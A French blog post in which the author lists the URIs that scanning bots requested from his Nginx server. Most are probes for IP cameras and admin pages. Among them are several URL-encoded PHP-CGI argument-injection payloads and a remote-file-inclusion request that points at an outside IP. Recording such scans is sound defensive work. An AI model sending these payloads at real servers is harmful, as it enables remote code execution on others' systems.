Analyse des logs de mon serveur web

Publié il y a 3 ans par Quentin

Depuis que j'ai lancé ce blog, à mon grand désarroi, j'ai plus de visites de bots que d'humains. Normal, j'ai à peine communiqué dessus et mon nouveau compte twitter ne compte que 3 followers(wouhou !). On va se rassurer en se disant que le but de ce blog n'est pas de faire des visites mais simplement de me donner une plate-forme d'expression en ligne.

Un des avantages d'avoir eu quasiment que des visites de bots, c'est que je peux facilement sortir le trafic illégal des logs de mon Nginx. Du coup, c'est parti pour une simple commande dans mon dossier de logs :

zgrep -v '<mon ip>' access.log* | awk '{ print $7 }' | sort | uniq -c | sort -n

Cette commande va parser l'ensemble de mes logs d'accès Nginx et en ressortir l'ensemble des uris qu'on a demandé à mon serveur en classant les lignes par nombre de demandes. Comme mon nombre de pages est limité, je peux facilement retirer de la liste tous les vrais accès. Le résultat donne la liste suivante(attention, c'est long) :

	  1 /1
      1 /1.j
      1 /1.jpg
      1 /1/video.cgi
      1 /2
      1 /2.j
      1 /2.jpg
      1 /2/video.cgi
      1 /3
      1 /3.j
      1 /3.jpg
      1 /3/video.cgi
      1 /access_code
      1 /?action=appletvstream
      1 /?action=snapshot
      1 /?action=stream
      1 /admin/
      1 //administrator
      1 //admin/phpmyadmin/scripts/setup.php
      1 //admin/pma/scripts/setup.php
      1 //admin/scripts/setup.php
      1 /admin/voice/
      1 /api.htm?op.liveimage=1
      1 /api/jpegControl.php?frameRate=10
      1 /api/mjpegvideo.cgi?InputNumber=1&StreamNumber=1
      1 /api/mjpegvideo.cgi?InputNumber=1&StreamNumber=2
      1 /api/mjpegvideo.cgi?InputNumber=1&StreamNumber=3
      1 /api/video?encode=h264(1)
      1 /api/video?encode=jpeg
      1 /api/video?encode=jpeg&framerate=15&boundary=on
      1 /api/video?encode=jpeg&framerate=2&boundary=on
      1 /appserv/main.php?appserv_root=http://163.24.125.10/appserv/a.txt?
      1 /?AUDIO=YES&CHOPIMAGE=YES&STREAM=YES&WANTIMAGE=1.JPG&SENDEMPTYIMAGES=NO
      1 /?AUDIO=YES&CHOPIMAGE=YES&STREAM=YES&WANTIMAGE=2.JPG&SENDEMPTYIMAGES=NO
      1 /?AUDIO=YES&CHOPIMAGE=YES&STREAM=YES&WANTIMAGE=3.JPG&SENDEMPTYIMAGES=NO
      1 /axis-cgi/jpg/image.cgi?camera=1&resolution=320x240&compression=
      1 /axis-cgi/jpg/image.cgi?camera=1&resolution=320x240&compression=25
      1 /axis-cgi/jpg/image.cgi?date=1&clock=1&camera=1&resolution=640x480
      1 /axis-cgi/jpg/image.cgi?date=1&clock=1&camera=2&resolution=640x480
      1 /axis-cgi/jpg/image.cgi?date=1&clock=1&camera=3&resolution=640x480
      1 /axis-cgi/jpg/image.cgi?date=1&clock=1&resolution=640x480
      1 //axis-cgi/mjpg/video.cgi
      1 /axis-cgi/mjpg/video.cgi
      1 /axis-cgi/mjpg/video.cgi?camera=1
      1 /axis-cgi/mjpg/video.cgi?camera=1&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?camera=2
      1 /axis-cgi/mjpg/video.cgi?camera=2&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?camera=3
      1 /axis-cgi/mjpg/video.cgi?camera=3&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?date=1&clock=1&camera=1&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?date=1&clock=1&camera=2&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?date=1&clock=1&camera=3&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?date=1&clock=1&resolution=640x480
      1 /axis-cgi/mjpg/video.cgi?resolution=
      1 /blog/xmlrpc.php
      1 /cam_1.cgi
      1 //cam1.jpg
      1 /cam_1.jpg
      1 /cam1.jpg
      1 /cam1/mjpeg
      1 /cam_2.cgi
      1 //cam2.jpg
      1 /cam_2.jpg
      1 /cam2.jpg
      1 /cam2/mjpeg
      1 /cam_3.cgi
      1 //cam3.jpg
      1 /cam_3.jpg
      1 /cam3.jpg
      1 /cam3/mjpeg
      1 /camera.jpg?camera=1
      1 /camera.jpg?camera=2
      1 /camera.jpg?camera=3
      1 /camera.push?camera=1
      1 /camera.push?camera=2
      1 /camera.push?camera=3
      1 /?camid=1
      1 /?camid=2
      1 /?camid=3
      1 /campic.jpg
      1 /capture1.jpg
      1 /capture2.jpg
      1 /capture3.jpg
      1 /capture_normal.jpg
      1 /c.cam?cid=1&nocache=1305216470825
      1 /c.cam?cid=2&nocache=1305216470825
      1 /c.cam?cid=3&nocache=1305216470825
      1 /CFIDE/administrator/
      1 /cgi-bin/admin/snapshot.cgi
      1 /cgi-bin/animate.cgi?1
      1 /cgi-bin/animate.cgi?2
      1 /cgi-bin/animate.cgi?3
      1 /cgi-bin/camera
      1 /cgi-bin/camera?ch=1&resolution=
      1 /cgi-bin/camera?ch=2&resolution=
      1 /cgi-bin/camera?ch=3&resolution=
      1 /cgi-bin/cameraid?UID=
      1 /cgi-bin/camera?UID=
      1 /cgi-bin/CGIStream.cgi?cmd=GetMJStream
      1 /cgi-bin/CGIStream.cgi?cmd=GetMJStream&usr=&pwd=
      1 /cgi-bin/checkimage.cgi?UID=&CAM=1
      1 /cgi-bin/checkimage.cgi?UID=&CAM=2
      1 /cgi-bin/checkimage.cgi?UID=&CAM=3
      1 /cgi-bin/cmd/encoder?GET_STREAM
      1 /cgi-bin/cmd/system?GET_STREAM&USER=&PWD=
      1 /cgi-bin/encoder?USER=&PWD=&GET_STREAM
      1 /cgi-bin/encoder?USER=&PWD=&SNAPSHOT
      1 /cgi-bin/fullsize.jpg?camera=1&clock=on&motion=0
      1 /cgi-bin/fullsize.jpg?camera=2&clock=on&motion=0
      1 /cgi-bin/fullsize.jpg?camera=3&clock=on&motion=0
      1 /cgi-bin/fwstream.cgi
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x00006784&PortId=0&CameraId=1&PauseTime=0&FwCgiVer=0x0001
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x00006784&PortId=0&CameraId=2&PauseTime=0&FwCgiVer=0x0001
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x00006784&PortId=0&CameraId=3&PauseTime=0&FwCgiVer=0x0001
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x331287e3&CameraId=1&PortId=0&PauseTime=1&FwCgiVer=0x0001
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x331287e3&CameraId=2&PortId=0&PauseTime=1&FwCgiVer=0x0001
      1 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x331287e3&CameraId=3&PortId=0&PauseTime=1&FwCgiVer=0x0001
      1 /cgi-bin/GetData.cgi?Status=false
      1 /cgi-bin/getimage
      1 /cgi-bin/getimage.cgi?motion=0
      1 /cgi-bin/getimage.cgi?motion=1
      1 /cgi-bin/getimage?java=0
      1 /cgi-bin/getstream.cgi
      1 /cgi-bin/getstream.cgi?ch=1&stream_id=0
      1 /cgi-bin/getstream.cgi?ch=2&stream_id=0
      1 /cgi-bin/getstream.cgi?ch=3&stream_id=0
      1 /cgi-bin/getstream.cgi?VideoType=1
      1 /cgi-bin/getstream.cgi?VideoType=2
      1 /cgi-bin/getstream.cgi?VideoType=3
      1 /cgi-bin/grabJPEG?06678
      1 /cgi-bin/grabJPG?06678
      1 /cgi-bin/guest/Video.cgi?media=JPEG
      1 /cgi-bin/guest/Video.cgi?media=JPEG&channel=1
      1 /cgi-bin/guest/Video.cgi?media=JPEG&channel=2
      1 /cgi-bin/guest/Video.cgi?media=JPEG&channel=3
      1 /cgi-bin/halfsize.jpg?camera=1&clock=on&motion=0
      1 /cgi-bin/halfsize.jpg?camera=2&clock=on&motion=0
      1 /cgi-bin/halfsize.jpg?camera=3&clock=on&motion=0
      1 /cgi-bin/hugesize.jpg?camera=1&clock=on
      1 /cgi-bin/hugesize.jpg?camera=1&clock=on&motion=0
      1 /cgi-bin/hugesize.jpg?camera=2&clock=on
      1 /cgi-bin/hugesize.jpg?camera=2&clock=on&motion=0
      1 /cgi-bin/hugesize.jpg?camera=3&clock=on
      1 /cgi-bin/hugesize.jpg?camera=3&clock=on&motion=0
      1 /cgi-bin/image320x240.jpg
      1 /cgi-bin/image640x480.jpg
      1 /cgi-bin/image.jpg
      1 /cgi-bin/image.jpg?size=640x480
      1 /cgi-bin/image.jpg?type=motion
      1 /cgi-bin/image/mjpeg.cgi?id=&passwd=
      1 /cgi-bin/jpeg
      1 /cgi-bin/jpeg?connect=start&vmdinfo=none&UID=9&ch=1&resolution=
      1 /cgi-bin/jpeg?connect=start&vmdinfo=none&UID=9&ch=2&resolution=
      1 /cgi-bin/jpeg?connect=start&vmdinfo=none&UID=9&ch=3&resolution=
      1 /cgi-bin/jpeg?session_id=1&buffer=0&prio=high&frame=4
      1 /cgi-bin/jpeg?session_id=2&buffer=0&prio=high&frame=4
      1 /cgi-bin/jpeg?session_id=3&buffer=0&prio=high&frame=4
      1 /cgi-bin/jpeg?stream=1
      1 /cgi-bin/jpeg?stream=2
      1 /cgi-bin/jpeg?stream=3
      1 /cgi-bin/jpg.cgi?refresh=0&channel=1&id=&pass=&resolution=640x480&oldbrowser=1
      1 /cgi-bin/jpg.cgi?refresh=0&channel=2&id=&pass=&resolution=640x480&oldbrowser=1
      1 /cgi-bin/jpg.cgi?refresh=0&channel=3&id=&pass=&resolution=640x480&oldbrowser=1
      1 /cgi-bin/jpg/image
      1 /cgi-bin/jpg/image.cgi.jpg
      1 /cgi-bin/media.cgi?action=getSnapshot
      1 /cgi-bin/mjpeg
      1 /cgi-bin/mjpeg?session_id=1&buffer=0&prio=high&frame=4
      1 /cgi-bin/mjpeg?session_id=2&buffer=0&prio=high&frame=4
      1 /cgi-bin/mjpeg?session_id=3&buffer=0&prio=high&frame=4
      1 /cgi-bin/mjpeg?stream=1
      1 /cgi-bin/mjpeg?stream=2
      1 /cgi-bin/mjpeg?stream=3
      1 /cgi-bin/mjpegstream?cam=1
      1 /cgi-bin/mjpegstream?cam=1&single=1
      1 /cgi-bin/mjpegstream?cam=2
      1 /cgi-bin/mjpegstream?cam=2&single=1
      1 /cgi-bin/mjpegstream?cam=3
      1 /cgi-bin/mjpegstream?cam=3&single=1
      1 /cgi-bin/mjpg.cgi?name=&password=&cam=1&fun=jpg
      1 /cgi-bin/mjpg.cgi?name=&password=&cam=2&fun=jpg
      1 /cgi-bin/mjpg.cgi?name=&password=&cam=3&fun=jpg
      1 /cgi-bin/mobile_snapshot.cgi?user=&pwd=
      1 /cgi-bin/net_jpeg.cgi?ch=1
      1 /cgi-bin/net_jpeg.cgi?ch=2
      1 /cgi-bin/net_jpeg.cgi?ch=3
      1 /cgi-bin/net_jpeg.cgi?ch=%7BCHANNEL
      1 /cgi-bin/net_video.cgi?channel=1
      1 /cgi-bin/net_video.cgi?channel=2
      1 /cgi-bin/net_video.cgi?channel=3
      1 /cgi-bin/nphContinuousServerPush
      1 /cgi-bin/nph-update_4ch.cgi?ch=1
      1 /cgi-bin/nph-update_4ch.cgi?ch=2
      1 /cgi-bin/nph-update_4ch.cgi?ch=3
      1 /cgi-bin/nph-video
      1 /cgi-bin/php
      1 /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
      1 /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
      1 /cgi-bin/php5
      1 /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
      1 /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
      1 /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
      1 /cgi-bin/pusher.cgi
      1 /cgi-bin/sf.cgi
      1 /cgi-bin/snapshot.cgi?1
      1 /cgi-bin/snapshot.cgi?chn=1&u=&p=
      1 /cgi-bin/snapshot.cgi?chn=2&u=&p=
      1 /cgi-bin/snapshot.cgi?chn=3&u=&p=
      1 /cgi-bin/snapshot.cgi?loginuse=&loginpas=
      1 /cgi-bin/still.cgi
      1 /cgi-bin/stilljpeg
      1 /cgi-bin/stream.cgi?stream=MainStream&Audio=1
      1 /cgi-bin/stream_jpeg.cgi?channel=1&fps=1&multipart=0
      1 /cgi-bin/stream_jpeg.cgi?channel=1&fps=1&multipart=1
      1 /cgi-bin/stream_jpeg.cgi?channel=2&fps=1&multipart=0
      1 /cgi-bin/stream_jpeg.cgi?channel=2&fps=1&multipart=1
      1 /cgi-bin/stream_jpeg.cgi?channel=3&fps=1&multipart=0
      1 /cgi-bin/stream_jpeg.cgi?channel=3&fps=1&multipart=1
      1 /cgi-bin/stream/nph-stream.cgi?id=&pw=&streamtype=jpeg&truenph=1
      1 /cgi-bin/stream/nph-stream.cgi?id=&pw=&streamtype=mjpeg&truenph=1
      1 /cgi-bin/Stream?Video
      1 /cgi-bin/Stream?Video%3FAcc=%3FPwd%3D%3FwebcamPWD%3DRootCookies00000
      1 //cgi-bin/Stream?Video%3FAcc=%3FPwd%3D%3FwebcamPWD%3DUserCookie00000
      1 /cgi-bin/Stream?Video%3FAcc=%3FPwd%3D%3FwebcamPWD%3DUserCookie00000
      1 /cgi-bin/test-cgi
      1 /cgi-bin/video1.jpg?size=2&quality=3
      1 /cgi-bin/video2.jpg?size=2&quality=3
      1 /cgi-bin/video3.jpg?size=2&quality=3
      1 /cgi-bin/video.cgi
      1 /cgi-bin/video.cgi?cam=1&quality=5&size=640x480
      1 /cgi-bin/video.cgi?cam=2&quality=5&size=640x480
      1 /cgi-bin/video.cgi?cam=3&quality=5&size=640x480
      1 /cgi-bin/video.cgi?msubmenu=jpg
      1 /cgi-bin/video.cgi?msubmenu=mjpg
      1 /cgi-bin/video.jpg
      1 /cgi-bin/video.jpg?cam=1&quality=3&size=2
      1 /cgi-bin/video.jpg?cam=1&quality=5&size=640x480
      1 /cgi-bin/video.jpg?cam=2&quality=3&size=2
      1 /cgi-bin/video.jpg?cam=2&quality=5&size=640x480
      1 /cgi-bin/video.jpg?cam=3&quality=3&size=2
      1 /cgi-bin/video.jpg?cam=3&quality=5&size=640x480
      1 /cgi-bin/video.jpg?size=2
      1 /cgi-bin/video_post.cgi
      1 /cgi-bin/video_snapshot.cgi?user=&pwd=
      1 /cgi-bin/videostream.cgi?rate=0&user=&pwd=
      1 /cgi-bin/videostream.cgi?user=&pwd=
      1 /cgi-bin/videostream.cgi?user=&pwd=&resolution=32
      1 /cgi-bin/video.vam
      1 /cgi-bin/view.cgi?chn=1&u=&p=
      1 /cgi-bin/view.cgi?chn=2&u=&p=
      1 /cgi-bin/view.cgi?chn=3&u=&p=
      1 /cgi-bin/viewer/snapshot.jpg?resolution=640x480
      1 /cgi-bin/viewer/video.jpg
      1 /cgi-bin/viewer/video.jpg?camera=1&resolution=640x480
      1 /cgi-bin/viewer/video.jpg?camera=2&resolution=640x480
      1 /cgi-bin/viewer/video.jpg?camera=3&resolution=640x480
      1 /cgi-bin/viewer/video.jpg?channel=1&resolution=640x480
      1 /cgi-bin/viewer/video.jpg?channel=2&resolution=640x480
      1 /cgi-bin/viewer/video.jpg?channel=3&resolution=640x480
      1 //cgi-bin/viewer/video.jpg?resolution=640x480
      1 /cgi-bin/view/image?pro_1
      1 /cgi-bin/view/image?pro_2
      1 /cgi-bin/view/image?pro_3
      1 /cgi-bin/wappaint?camera_no=1&animation=0&name=&password=&pic_size=2
      1 /cgi-bin/wappaint?camera_no=2&animation=0&name=&password=&pic_size=2
      1 /cgi-bin/wappaint?camera_no=3&animation=0&name=&password=&pic_size=2
      1 /cgi-bin/webapp.cgi?MODE=8&ID=&PW=&VER=3000&CH=1
      1 /cgi-bin/webapp.cgi?MODE=8&ID=&PW=&VER=3000&CH=2
      1 /cgi-bin/webapp.cgi?MODE=8&ID=&PW=&VER=3000&CH=3
      1 /cgi-bin/webra_fcgi.fcgi?api=get_jpeg_raw&chno=1
      1 /cgi-bin/webra_fcgi.fcgi?api=get_jpeg_raw&chno=2
      1 /cgi-bin/webra_fcgi.fcgi?api=get_jpeg_raw&chno=3
      1 /__/cgi/image
      1 /cgi/jpg/image.cgi
      1 //cgi/mjpg/mjpeg.cgi
      1 /cgi/mjpg/mjpeg.cgi
      1 /cgi/mjpg/mjpg.cgi
      1 /cgi/mpeg4/mpeg4.cgi
      1 /cgi/sf.cgi
      1 /cgi/snapshot.cgi?action=getdata&channel.1.capture=true&channel.1.resolution=1
      1 /cgi/snapshot.cgi?action=getdata&channel.2.capture=true&channel.2.resolution=1
      1 /cgi/snapshot.cgi?action=getdata&channel.3.capture=true&channel.3.resolution=1
      1 /CgiStart?page=Single&Resolution=640x480&Quality=Standard&Language=0
      1 /cgi-usr/image
      1 /cgi-usr/nph-image
      1 /cgi-usr/nph-video
      1 /CH1/oneshotimage.jpg
      1 /CH2/oneshotimage.jpg
      1 /CH3/oneshotimage.jpg
      1 /Channel1
      1 /channel2
      1 /Channel2
      1 /Channel3
      1 /cmd=live&codec=mjpeg&ID=1/
      1 /cmd=live&codec=mjpeg&ID=2/
      1 /cmd=live&codec=mjpeg&ID=3/
      1 /cms/administrator
      1 /command/image.cgi?grant=User&channelno=1
      1 /command/image.cgi?grant=User&channelno=2
      1 /command/image.cgi?grant=User&channelno=3
      1 /config/jpeg.cgi
      1 /control/faststream.jpg?stream=full
      1 /control/faststream.jpg?stream=MxPEG&needlength&fps=6
      1 /current1.jpg
      1 /current1.mjpg
      1 /current2.jpg
      1 /current2.mjpg
      1 /current3.jpg
      1 /current3.mjpg
      1 /dbadmin/
      1 //dbadmin/scripts/setup.php
      1 //db/scripts/setup.php
      1 /display_pic.cgi?cam=1&res=hi
      1 /display_pic.cgi?cam=2&res=hi
      1 /display_pic.cgi?cam=3&res=hi
      1 /dms
      1 /dms.jpg
      1 /dms?nowprofileid=1
      1 /dms?nowprofileid=2
      1 /dms?nowprofileid=3
      1 /dsr-cgi/getdsrimage.cgi?camera=1&username=&password=&adfa=1
      1 /dsr-cgi/getdsrimage.cgi?camera=2&username=&password=&adfa=1
      1 /dsr-cgi/getdsrimage.cgi?camera=3&username=&password=&adfa=1
      1 /faststream.jpg?stream=full&fps=0
      1 /feed/
      1 /fullsize.jpg?camera=1
      1 /fullsize.jpg?camera=2
      1 /fullsize.jpg?camera=3
      1 /fullsize.push?camera=1
      1 /fullsize.push?camera=1&sleep=15
      1 /fullsize.push?camera=2
      1 /fullsize.push?camera=3
      1 /_gCVimage.jpg
      1 /getcam
      1 /GetData.cgi
      1 /GetData.cgi?Camera=0&BandWidth=0
      1 /GetData.cgi?CH=1&Codec=jpeg&Size=640x480
      1 /GetData.cgi?CH=2
      1 /GetData.cgi?CH=2&Codec=jpeg&Size=640x480
      1 /GetData.cgi?CH=3&Codec=jpeg&Size=640x480
      1 /GetData.cgi?Status=0
      1 /GetData.cgi?Status=1
      1 /GetData.cgi?Status=false
      1 /getimage
      1 /getimage01
      1 /getimage02
      1 /getimage03
      1 /getimage1
      1 /getimage2
      1 /getimage3
      1 /getimage?camera=1&fmt=720p
      1 /getimage?camera=1&fmt=full
      1 /getimage?camera=1&fmt=vga
      1 /getimage?camera=2&fmt=720p
      1 /getimage?camera=2&fmt=full
      1 /getimage?camera=2&fmt=vga
      1 /getimage?camera=3&fmt=720p
      1 /getimage?camera=3&fmt=full
      1 /getimage?camera=3&fmt=vga
      1 /Getimage.cgi
      1 /GetImage.cgi
      1 /GetImage.cgi?CH=1
      1 /GetImage.cgi?CH=2
      1 /GetImage.cgi?CH=3
      1 /getimage?video=1&audio=0
      1 /getjpeg.cgi?ch1
      1 /getjpeg.cgi?ch2
      1 /getjpeg.cgi?ch3
      1 /GetJPG.cgi?CH=1
      1 /GetJPG.cgi?CH=2
      1 /GetJPG.cgi?CH=3
      1 /GetStream.cgi
      1 /getstream.cgi?10&10&&&10&0&0&0&0
      1 /GetStream.cgi?Video=1
      1 /GetStream.cgi?Video=2
      1 /GetStream.cgi?Video=3
      1 /Getvideo.cgi?Cookie=
      1 /goform/capture
      1 /goform/stream?cmd=get&channel=1
      1 /goform/stream?cmd=get&channel=2
      1 /goform/stream?cmd=get&channel=3
      1 /goform/video
      1 /goform/video2
      1 /h264
      1 /halfsize.jpg?camera=1
      1 /halfsize.jpg?camera=2
      1 /halfsize.jpg?camera=3
      1 /html/languages/es_es/main.js
      1 http://24x7-allrequestsallowed.com/?PHPSESSID=aab45f4f00143SSQJRQ_EFAFUBT
      1 http://94.102.49.210/?qb=94.102.49.210/
      1 http://check.proxyradar.com/azenv.php?auth=144665893797&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144667077773&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144668282765&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144669461167&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144670612319&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144671760859&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144672903553&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144674080739&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144675229971&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144676377895&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144677501359&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144678609587&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144679783827&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144680919463&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144682040607&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144683231227&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144684398279&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144685509471&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144686666587&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144687902275&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144689066785&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144690603331&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144691793697&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144693041435&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144694190871&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144695421459&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144696543995&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144697844305&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144698978239&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144700100549&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144701306181&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144702443087&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144704200777&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144705402501&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144706543533&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144707666047&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144708790871&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144709937589&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144711073813&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144712217403&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144713445531&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144714626737&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144717698899&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144718862775&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144720283811&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144722610295&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144723777469&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144724938667&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144726101301&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144727255449&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144728428449&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144729586797&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144730726737&a=PSCMN&i=3559912860&p=80
